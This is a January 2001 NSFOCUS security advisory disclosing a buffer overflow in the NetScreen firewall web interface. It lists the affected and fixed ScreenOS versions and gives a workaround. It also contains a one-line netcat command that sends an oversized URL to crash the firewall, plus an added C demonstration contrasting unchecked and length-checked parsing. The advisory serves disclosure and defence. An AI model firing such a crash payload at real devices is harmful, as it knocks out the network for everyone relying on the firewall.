Date: Tue, 9 Jan 2001 12:55:36 +0800
From: Nsfocus Security Team <security@NSFOCUS.COM>
To: [email protected]
Subject: NSFOCUS SA2001-01: NetScreen Firewall WebUI Buffer Overflow vulnerability
NSFOCUS Security Advisory (SA2001-01)

Topic: NetScreen Firewall WebUI Buffer Overflow vulnerability

Release Date: Jan 9th, 2001

CVE Candidate Number: CAN-2001-0007

Affected systems:
=================
ScreenOS release 1.73r1 on the NetScreen-1000
ScreenOS release 2.01r6 on the NetScreen-10/100
ScreenOS release 2.10r3 on the NetScreen-5
ScreenOS release 2.5r1 on the NetScreen-5/10/100

Non-affected systems:
=====================
ScreenOS release 1.73r2 on the NetScreen-1000
ScreenOS release 2.01r7 on the NetScreen-10/100
ScreenOS release 2.10r4 on the NetScreen-5
ScreenOS release 2.5r2 on the NetScreen-5/10/100

Impact:
=======

NSFOCUS Security Team has found a buffer overflow vulnerability in the
NetScreen Firewall WebUI. By exploiting it, an unauthenticated remote
attacker can crash the firewall, causing a denial of service for all
traffic that passes through it.

Description:
============

NetScreen Firewall is a popular commercial firewall. It has a web
administration interface (WebUI, listening on port 80 by default) that
lets the firewall administrator configure the firewall from a browser.
However, the WebUI does not check the length of the requested URL. When
it receives an oversized URL, a buffer overflow occurs and the NetScreen
firewall crashes. All connections through the firewall are dropped, the
firewall stops responding to any connection request, and it must be
rebooted to restore service.

No authentication is required: the attacker does not need to log in to
the firewall.

All current ScreenOS versions, including 1.73r1, 2.01r6, 2.10r3 and
2.5r1, are affected whenever the WebUI has been enabled.

Exploit:
========

Once the requested URL is longer than 1220 bytes, the NetScreen firewall
crashes:

  $ echo -e "GET /`perl -e 'print "A"x1220'` HTTP/1.0\n\n" | nc netscreen_firewall 80

The following information appears on the firewall console:

  ****************************** EXCEPTION ******************************
  Bus error execption (data reference: load or store)
  EPC = 0x8009AA1C, SR = 0x34501007, Cause = 0x0080001C

The firewall then halts.
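To make the mechanism behind the crash above concrete, the following is an added C example written for this page; it is not ScreenOS code (NetScreen's implementation is not public and the real buffer size is unknown). It models an HTTP request-line parser that copies the URL into a fixed-size buffer with no length check, beside a hardened version that measures the request-target first and rejects anything that does not fit with HTTP 414 before copying. The buffer size (256), the function names and the simulated-memory layout are assumptions chosen so the overwrite is visible without corrupting the real stack; the 1220-'A' probe is the one from this advisory.

```c
#include <stdio.h>
#include <string.h>
/* Sizes are assumptions for this demonstration, not ScreenOS constants. */
#define URL_BUF_SIZE  256    /* hypothetical fixed-size URL buffer in the WebUI */
#define SIM_MEM_SIZE  4096   /* simulated memory: URL buffer plus what follows it */
#define MAX_REQ_LINE  2048   /* longest request line the toy server accepts */
#define ADJACENT_FILL 0xA5   /* pattern marking the memory after the URL buffer */
/* One flat array, so writing past the URL buffer is observable and well-defined;
 * bytes from URL_BUF_SIZE on stand in for adjacent data (saved registers, ...). */
struct sim_mem { unsigned char bytes[SIM_MEM_SIZE]; };

void sim_mem_init(struct sim_mem *m) {
    memset(m->bytes, 0, URL_BUF_SIZE);
    memset(m->bytes + URL_BUF_SIZE, ADJACENT_FILL, SIM_MEM_SIZE - URL_BUF_SIZE);
}

/* 1 if nothing beyond the URL buffer has been written. */
int sim_mem_intact(const struct sim_mem *m) {
    for (size_t i = URL_BUF_SIZE; i < SIM_MEM_SIZE; i++)
        if (m->bytes[i] != ADJACENT_FILL) return 0;
    return 1;
}

/* Locate the request-target in "METHOD SP request-target SP HTTP/x.y";
 * returns 0 if the line is malformed. */
static int split_request_line(const char *line, const char **target, size_t *len) {
    const char *sp1 = strchr(line, ' ');
    const char *sp2 = sp1 ? strchr(sp1 + 1, ' ') : NULL;
    if (!sp2) return 0;
    *target = sp1 + 1;
    *len = (size_t)(sp2 - *target);
    return 1;
}

/* Vulnerable pattern (the bug class in the advisory): the request-target is
 * copied into the fixed URL buffer with no check against URL_BUF_SIZE.
 * Returns bytes copied, 0 for a malformed line. */
size_t webui_parse_unchecked(const char *line, struct sim_mem *m) {
    const char *target; size_t len;
    if (!split_request_line(line, &target, &len)) return 0;
    if (len >= SIM_MEM_SIZE) return 0;  /* keeps the simulation in bounds; real firmware has no such net */
    memcpy(m->bytes, target, len);      /* runs past URL_BUF_SIZE when len is large */
    m->bytes[len] = '\0';
    return len;
}

/* Hardened version: measure first, refuse what does not fit, then copy.
 * 0 on success, 400 for a malformed line, 414 (URI Too Long) if the target
 * plus terminator would not fit. */
int webui_parse_checked(const char *line, struct sim_mem *m) {
    const char *target; size_t len;
    if (!split_request_line(line, &target, &len)) return 400;
    if (len >= URL_BUF_SIZE) return 414;
    memcpy(m->bytes, target, len);
    m->bytes[len] = '\0';
    return 0;
}

/* Build the advisory's probe, "GET /" + n 'A's + " HTTP/1.0\r\n\r\n"; 0 if it does not fit. */
int build_request(size_t n, char *out, size_t outsz) {
    static const char prefix[] = "GET /", suffix[] = " HTTP/1.0\r\n\r\n";
    size_t plen = sizeof prefix - 1;
    if (plen + n + sizeof suffix > outsz) return 0;   /* sizeof suffix counts the NUL */
    memcpy(out, prefix, plen);
    memset(out + plen, 'A', n);
    memcpy(out + plen + n, suffix, sizeof suffix);
    return 1;
}

/* Unchecked parser on the 1220-'A' request: 1 if memory past the URL buffer
 * was overwritten, -1 on setup failure. */
int demo_unchecked_overflows(void) {
    char req[MAX_REQ_LINE]; struct sim_mem m;
    if (!build_request(1220, req, sizeof req)) return -1;
    sim_mem_init(&m);
    webui_parse_unchecked(req, &m);
    return sim_mem_intact(&m) ? 0 : 1;
}

/* Hardened parser on the same request: its status (expected 414), or -1 if it
 * touched adjacent memory. */
int demo_checked_status(void) {
    char req[MAX_REQ_LINE]; struct sim_mem m;
    if (!build_request(1220, req, sizeof req)) return -1;
    sim_mem_init(&m);
    int rc = webui_parse_checked(req, &m);
    return sim_mem_intact(&m) ? rc : -1;
}

/* A normal request must still work: 1 if the hardened parser accepts
 * "GET /index.html HTTP/1.0" and stores exactly "/index.html". */
int demo_checked_accepts_normal(void) {
    struct sim_mem m;
    sim_mem_init(&m);
    if (webui_parse_checked("GET /index.html HTTP/1.0\r\n\r\n", &m) != 0) return 0;
    return strcmp((const char *)m.bytes, "/index.html") == 0 && sim_mem_intact(&m);
}

int main(void) {
    printf("unchecked parser, 1220-byte URL: adjacent memory %s\n",
           demo_unchecked_overflows() == 1 ? "OVERWRITTEN" : "intact");
    printf("checked parser, 1220-byte URL: status %d; /index.html %s\n",
           demo_checked_status(), demo_checked_accepts_normal() ? "accepted" : "rejected");
    return 0;
}
```

The point of the hardened parser is ordering: the length is computed and compared against the destination before a single byte is copied, so an oversized request-target yields a clean 414 instead of a write past the buffer. On a MIPS device, as in the console output above, such a write typically surfaces as a bus error or address exception when the clobbered saved registers are reloaded, which is why the whole firewall halts rather than just the WebUI session.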

Workaround:
===========

Until the relevant patch has been obtained and installed, disable WebUI
management, or restrict management access to trusted administration
hosts so that untrusted networks cannot reach the WebUI port on the
firewall.

Vendor Status:
==============

We notified NetScreen of this vulnerability on 12/19/2000. On 12/26/2000
NetScreen released the following ScreenOS versions to fix the bug:

ScreenOS 1.73r2 on the NetScreen-1000
ScreenOS 2.10r4 on the NetScreen-5
ScreenOS 2.01r7 on the NetScreen-10/100
ScreenOS 2.5.0r2 on the NetScreen-5/10/100

The latest software is available at:
http://www.netscreen.com/support/updates.html

You can also contact the NetScreen Technical Support Center
(mailto:support@netscreen.com) for the upgraded software.

Additional Information:
=======================

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2001-0007 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems. Candidates may change significantly before they
become official CVE entries.

DISCLAIMER:
===========

THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PERMITTED PROVIDED THAT
THE ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2000 NSFOCUS. All Rights Reserved.

NSFOCUS Security Team <security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO., LTD
(http://www.nsfocus.com)